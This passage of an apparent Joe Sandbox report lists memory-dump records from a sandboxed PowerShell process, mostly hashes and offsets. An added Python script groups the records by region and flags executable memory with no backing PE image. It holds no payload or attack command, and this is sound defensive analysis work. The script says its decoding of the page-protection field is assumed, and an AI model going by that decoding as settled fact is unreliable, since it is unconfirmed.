                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 276f14a96b82fd0f68c7991b1b942c2e2d7a4f8e6c985102c82c51549a0d8b1d
                    • Instruction ID: af2bb3d67584b80b194a618ee08cc65b7678a49c81c777e912ccf8d9a34cc40d
                    • Opcode Fuzzy Hash: 276f14a96b82fd0f68c7991b1b942c2e2d7a4f8e6c985102c82c51549a0d8b1d
                    • Instruction Fuzzy Hash: 2511A1757142218FCB04EF39E89892ABBF5FF8A25031480BAE056C7365CB31EC40CB54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: dee5738e646ecd4e7a8092fad56bf036eb0b799e19c0050a1631c42f8c6e4a5a
                    • Instruction ID: 8ca4a4cd118f16bdd29cd814a7d0904e65112b7cd9310e48a90c55188c64c55e
                    • Opcode Fuzzy Hash: dee5738e646ecd4e7a8092fad56bf036eb0b799e19c0050a1631c42f8c6e4a5a
                    • Instruction Fuzzy Hash: EB0121B7B041100B4B20EABE788802FA78BDFE02703198237E706C7394EE32CC818361
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b9ec6a97e37b8a2d15b110ee30ef9113a846fc02da1ec6d2b99c046a353b0bde
                    • Instruction ID: fb6fa61a473633276bee37ecb4ac4c77ef4c8c4cb4da11706d1eab0131a2971c
                    • Opcode Fuzzy Hash: b9ec6a97e37b8a2d15b110ee30ef9113a846fc02da1ec6d2b99c046a353b0bde
                    • Instruction Fuzzy Hash: B80161357105218F8714EF29E49892EBBEAFFCA651714807AE10AC7365DF75DC40CB54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.822026660.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_32b0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 29388243894b1d9fd32c3432ab30faec8a1a0822280ef1d867229cf1c92bcf55
                    • Instruction ID: fe47d341a7b6eceaf9e9a50e556bb6626a1e97548a6e7b560a407b9fde634f30
                    • Opcode Fuzzy Hash: 29388243894b1d9fd32c3432ab30faec8a1a0822280ef1d867229cf1c92bcf55
                    • Instruction Fuzzy Hash: 7E01D2313482844FD701D779E4589A87BB5DFC736931980EAD40DCB262DA26CC02C761
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 14a0f9471834713b6fa0999a79dba7e5157792568187d515dbdf5c503332fb0f
                    • Instruction ID: fc1b1163a0e06cd16cc810a248ad9ecc17038b779c9de5ceb34ffcd45b190e7e
                    • Opcode Fuzzy Hash: 14a0f9471834713b6fa0999a79dba7e5157792568187d515dbdf5c503332fb0f
                    • Instruction Fuzzy Hash: 1001CC743107549FC728EB65E984A2B77FAFB88216B00842DE543C7B41CB35F8468B50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.822683341.000000000338D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0338D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_338d000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8df3e911ffee82bf07fc369ed6f0e6a75c7d194694c435dc2763cd4838a108fd
                    • Instruction ID: b291e4335ac97c88e13872cc2d986226450bcf9d28829606530e901da3730769
                    • Opcode Fuzzy Hash: 8df3e911ffee82bf07fc369ed6f0e6a75c7d194694c435dc2763cd4838a108fd
                    • Instruction Fuzzy Hash: 5501F7B04083449AD710DB26DCC4B66FB9CEF41668F0C805AED445B6C6C3BD9945C6B2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 07d03244f7741ecc868481f7b93e2ff0c014a5e1cb373e29b4017c60c8abf887
                    • Instruction ID: 77ee09b0ce3f7e0f13d10179f77e1134b0da169a7c601fe521f915df5c77e7d7
                    • Opcode Fuzzy Hash: 07d03244f7741ecc868481f7b93e2ff0c014a5e1cb373e29b4017c60c8abf887
                    • Instruction Fuzzy Hash: 98F0F0BB7182401F8712AB7978584AEBF9ADFE217030AC067E606CB755DD258C829771
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.822026660.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_32b0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f46089799dac04caf2a7ca36ab22d17ab90ce6fdba014c0847681a0744fcf470
                    • Instruction ID: ef34dae2df8645ab21178ce1eeda4851aee0a44dc2beba96952eabb6952ddf44
                    • Opcode Fuzzy Hash: f46089799dac04caf2a7ca36ab22d17ab90ce6fdba014c0847681a0744fcf470
                    • Instruction Fuzzy Hash: 34012970E002599BDB18DFB9D458BDEBBF6AB8C300F148169D405B7384DB759985CFA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.822683341.000000000338D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0338D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_338d000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fb372c59dfd3720a3f18c8aae26bcd4144e6aff7ef2c306773ceefd4ee379490
                    • Instruction ID: 90084386b7bc12acd783426e003052b1c9327dc3d4e238c876a7332973bd4363
                    • Opcode Fuzzy Hash: fb372c59dfd3720a3f18c8aae26bcd4144e6aff7ef2c306773ceefd4ee379490
                    • Instruction Fuzzy Hash: E4014C6140D3C09ED7128B25CC94B62BFB4EF47624F0D81CBD9848F2E7C2699848CBB2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 236b88a5a4c3ed794b01f7243d83b60626d79a7eeb5a86a2571ac66ddad6fa54
                    • Instruction ID: 857960f7e9241d50f93e54b42d3e912fb45c8d2e171a58dfc0f3a1093a3416c3
                    • Opcode Fuzzy Hash: 236b88a5a4c3ed794b01f7243d83b60626d79a7eeb5a86a2571ac66ddad6fa54
                    • Instruction Fuzzy Hash: 19F0A73674422557D728A66EF858B6BB39EEFC4625F24807AF20DCB391DD61DC8102A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 738b03a2b2b5d3a12440160f0183adc8414dc3ab9f4a6898074d07c3d39ebaaf
                    • Instruction ID: 89a76abb29274d92300dc2e616a96a9ffe3706d22da6175d15f117579548a07c
                    • Opcode Fuzzy Hash: 738b03a2b2b5d3a12440160f0183adc8414dc3ab9f4a6898074d07c3d39ebaaf
                    • Instruction Fuzzy Hash: 7DF0F631B103585BEF24CB61DC557DABB79EF84710F0040ADD609A3286DB7168988B95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.822026660.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_32b0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a5bfeca0f9bf5a9151c2c6327d5ec6e21d7c3491741d3ad159015550a55bb669
                    • Instruction ID: c32138e924ed539f807ad8e88f83b4ef993a41f11b988e32377c7fdf2323a41b
                    • Opcode Fuzzy Hash: a5bfeca0f9bf5a9151c2c6327d5ec6e21d7c3491741d3ad159015550a55bb669
                    • Instruction Fuzzy Hash: B601F635A01118DFDB04EB90F498BDCBBB2FB88321F109025E50567384CB31AD91CF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: be62012ce4f36bf9a73bdbe3c0c10bb1887f255c338a4f11ffd13929d4540ae7
                    • Instruction ID: 4b806b30c673b60237552c94d6b13910dd92f6eec5065ab2e3a2a4818c92a858
                    • Opcode Fuzzy Hash: be62012ce4f36bf9a73bdbe3c0c10bb1887f255c338a4f11ffd13929d4540ae7
                    • Instruction Fuzzy Hash: 2CE0DF327102014F8320AF5EF488C2BBBEAABC8631309806AE10DC3315CAA0DC89C790
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.822026660.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_32b0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 107b8e5dea7235c01124e3f13039ae7579fdacc7c65d95bb01d6893af2b7a64d
                    • Instruction ID: cbd50a92171ce485e81fde14721f3152316af642af7453ba9eaf7203ed969046
                    • Opcode Fuzzy Hash: 107b8e5dea7235c01124e3f13039ae7579fdacc7c65d95bb01d6893af2b7a64d
                    • Instruction Fuzzy Hash: F0E09275A05248DFCB05DFB0EA2429D7BB2DB46204F1288EBC04ADB698DF301F06D762
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.822026660.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_32b0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0473ba18291041954cd5a9de5d7a1f39f8cf751423cac3a19e72a5fc19265173
                    • Instruction ID: 2002dda31260b33202a46b8c92105f23fadb2f8cea3b34a2710a15aed9f9c243
                    • Opcode Fuzzy Hash: 0473ba18291041954cd5a9de5d7a1f39f8cf751423cac3a19e72a5fc19265173
                    • Instruction Fuzzy Hash: E1E0E674A0520CDFC704EFA4E55065E77B6DB45204F1148A8C549D7394DF351E0197A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 840d9c188f4e5d3e5200d634cac027f46e45ae9f2da83a42c26783f7e373cca9
                    • Instruction ID: e1a4ca5709d6e0aa1ea520c136f82064b316def7f4b66e9bf120e4e5ed886631
                    • Opcode Fuzzy Hash: 840d9c188f4e5d3e5200d634cac027f46e45ae9f2da83a42c26783f7e373cca9
                    • Instruction Fuzzy Hash: CEB012333140208705083349704806CF366EAD00763104033E10BC0058CA5108D30254
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: db0a9fb0e8ac362cfc4c36e52b0c44120d24eb6a2d62396529d9efb2632c5efd
                    • Instruction ID: 3d9970987bb84678e9b14aaeb536bd4c6e8e1000dd64935ff9b1bedd45d0226a
                    • Opcode Fuzzy Hash: db0a9fb0e8ac362cfc4c36e52b0c44120d24eb6a2d62396529d9efb2632c5efd
                    • Instruction Fuzzy Hash: 794193B5E106258FDB10CF75C844A6FBBF6BF88350F068569D556E7350D770A980CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: DK1l$Xc1l$lj$lj
                    • API String ID: 0-2641367100
                    • Opcode ID: ba61949d9f4578b3276d86672d49c385208294a750cc5e2a41eb74249bfc7ca2
                    • Instruction ID: 5715401c64546f0bbc1b39cabc44db84ca9a97d5cb973479fd05a02faf50a25a
                    • Opcode Fuzzy Hash: ba61949d9f4578b3276d86672d49c385208294a750cc5e2a41eb74249bfc7ca2
                    • Instruction Fuzzy Hash: 49B18D79710205CFCB14DF39D59486EB7B6FF89214725C4AAD8069B365DB31EC82CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: DK1l$Xc1l$lj$lj
                    • API String ID: 0-2641367100
                    • Opcode ID: 40f75c060292b06ac40494337aa6af76ee994492d264196cad454edc7c6ee166
                    • Instruction ID: aae5be330390e4c38857ece08e6d850d6704bb279d7b32fec4b7e14d8805d456
                    • Opcode Fuzzy Hash: 40f75c060292b06ac40494337aa6af76ee994492d264196cad454edc7c6ee166
                    • Instruction Fuzzy Hash: C581B0347106018FC709DB39D59896EBBF6BFCA61472980AED40ADB765CB35DC82CB80
                    Uniqueness

                    Uniqueness Score: -1.00%
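The records above all share one layout: a `Memory Dump Source` line naming the `.sdmp` region the function was lifted from, a snapshot file name that repeats the process index, iteration and base address, and per-function opcode/instruction hashes. When a report lists hundreds of these, the question a responder actually wants answered is how many distinct regions the code came from, whether each region is backed by a PE image, and whether it is executable. The script below is an added example (not code from the Joe Sandbox report or from Joe Security) that parses an abridged copy of three records from this listing and groups them per region. What the page itself confirms is only that the first two dotted fields of the `.sdmp` name match the `hcaresult_3_2_…` snapshot name and that the fourth field equals the printed `Offset`; treating the fifth field (`00000040`) as the Windows `PAGE_*` protection of the region is an assumption, labelled as such in the code.

```python
"""Parse Joe Sandbox 'Memory Dump Source' records and summarise them per memory region.
Added example; the .sdmp field meanings past the base address are ASSUMED (see comments)."""
import re

# Windows PAGE_* constants from winnt.h (low byte; PAGE_GUARD etc. are modifier bits).
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
EXECUTABLE = frozenset((0x10, 0x20, 0x40, 0x80))

# ASSUMED layout: pid.iteration.dumpid.base.protect.<three more 8-hex fields>.sdmp
SDMP_RE = re.compile(r"(?P<pid>[0-9A-Fa-f]{8})\.(?P<iteration>[0-9A-Fa-f]{8})\.(?P<dump_id>\d+)\."
                     r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})(?:\.[0-9A-Fa-f]{8}){3}\.sdmp")
SNAPSHOT_RE = re.compile(r"hcaresult_(?P<pid>\d+)_(?P<iteration>\d+)_(?P<base>[0-9A-Fa-f]+)_(?P<proc>.+)\.jbxd")
SOURCE_RE = re.compile(r"(?P<file>\S+),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)")

# Sample input: three records copied from the listing above, abridged to the fields used here.
REPORT_EXCERPT = """\
Memory Dump Source
• Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
• Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
• String ID:
• API String ID:
• Opcode ID: b9ec6a97e37b8a2d15b110ee30ef9113a846fc02da1ec6d2b99c046a353b0bde
• Instruction Fuzzy Hash: B80161357105218F8714EF29E49892EBBEAFFCA651714807AE10AC7365DF75DC40CB54
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 00000003.00000002.822026660.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
• Snapshot File: hcaresult_3_2_32b0000_powershell.jbxd
• String ID:
• API String ID:
• Opcode ID: 29388243894b1d9fd32c3432ab30faec8a1a0822280ef1d867229cf1c92bcf55
• Instruction Fuzzy Hash: 7E01D2313482844FD701D779E4589A87BB5DFC736931980EAD40DCB262DA26CC02C761
Uniqueness Score: -1.00%
Strings
Memory Dump Source
• Source File: 00000003.00000002.821609911.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
• Snapshot File: hcaresult_3_2_3260000_powershell.jbxd
• String ID: DK1l$Xc1l$lj$lj
• API String ID: 0-2641367100
• Opcode ID: ba61949d9f4578b3276d86672d49c385208294a750cc5e2a41eb74249bfc7ca2
• Instruction Fuzzy Hash: 49B18D79710205CFCB14DF39D59486EB7B6FF89214725C4AAD8069B365DB31EC82CB90
Uniqueness Score: -1.00%
"""


def parse_sdmp_name(name):
    """Decode a dump file name into its fields; ValueError if the layout is not the assumed one."""
    m = SDMP_RE.fullmatch(name)
    if m is None:
        raise ValueError(f"unexpected .sdmp name: {name}")
    protect = int(m["protect"], 16) & 0xFF
    return {"pid": int(m["pid"], 16), "iteration": int(m["iteration"], 16), "base": int(m["base"], 16),
            "protect": protect, "protect_name": PAGE_PROTECT.get(protect, "UNKNOWN"),
            "executable": protect in EXECUTABLE}


def _field(line):
    """Split a '• Key: value' report line into (key, value); None for headings and blank lines."""
    line = line.strip().lstrip("•").strip()
    if ":" not in line:
        return None
    key, _, value = line.partition(":")
    return key.strip(), value.strip()


def parse_records(text):
    """One dict per 'Memory Dump Source' block, with the offset/snapshot cross-checked against the name."""
    records, cur = [], None
    for raw in text.splitlines():
        if raw.strip() == "Memory Dump Source":
            cur = {"string_id": "", "consistent": True}
            records.append(cur)
            continue
        f = _field(raw) if cur is not None else None
        if f is None:
            continue
        key, value = f
        if key == "Source File":
            m = SOURCE_RE.fullmatch(value)
            if m is None:
                raise ValueError(f"unexpected Source File line: {value}")
            cur.update(parse_sdmp_name(m["file"]))
            cur["source_file"], cur["offset"] = m["file"], int(m["offset"], 16)
            cur["pe_backed"] = m["pe"] == "true"
            cur["consistent"] &= cur["offset"] == cur["base"]
        elif key == "Snapshot File":
            m = SNAPSHOT_RE.fullmatch(value)
            if m and "base" in cur:  # snapshot name must refer to the same pid/iteration/base
                cur["process"] = m["proc"]
                cur["consistent"] &= (int(m["pid"]), int(m["iteration"]), int(m["base"], 16)) == \
                                     (cur["pid"], cur["iteration"], cur["base"])
        elif key == "Opcode ID":
            cur["opcode_id"] = value
        elif key == "Instruction Fuzzy Hash":
            cur["instruction_fuzzy_hash"] = value
        elif key == "String ID":  # 'API String ID' is a different key and is not matched here
            cur["string_id"] = value
        elif key == "Uniqueness Score":
            cur["uniqueness_score"] = float(value.rstrip("%"))
    return records


def summarize(records):
    """Group functions by (pid, base) and flag executable regions that have no backing PE image."""
    regions = {}
    for r in records:
        reg = regions.setdefault((r["pid"], r["base"]), {
            "process": r.get("process", "?"), "protect": r["protect_name"], "pe_backed": r["pe_backed"],
            "functions": 0, "with_strings": 0, "opcode_ids": set(),
            "unbacked_executable": r["executable"] and not r["pe_backed"]})
        reg["functions"] += 1
        reg["opcode_ids"].add(r["opcode_id"])
        reg["with_strings"] += bool(r["string_id"])
    return regions


if __name__ == "__main__":
    for (pid, base), reg in sorted(summarize(parse_records(REPORT_EXCERPT)).items()):
        flag = "  <-- executable and not PE-backed: treat as injected/unpacked code" if reg["unbacked_executable"] else ""
        print(f"pid {pid} {reg['process']} 0x{base:08X} {reg['protect']} "
              f"functions={reg['functions']} with_strings={reg['with_strings']}{flag}")
```

Run it on the full "Executed/Non-executed Functions" listing and the per-region counts tell you where to start: a private region that is executable and `based on PE: false`, as both regions here are under the assumed protection field, is the memory you carve and scan (YARA, string extraction) before touching anything PE-backed. The `consistent` flag catches extraction damage in the report text, since the offset and snapshot name should always agree with the dump file name.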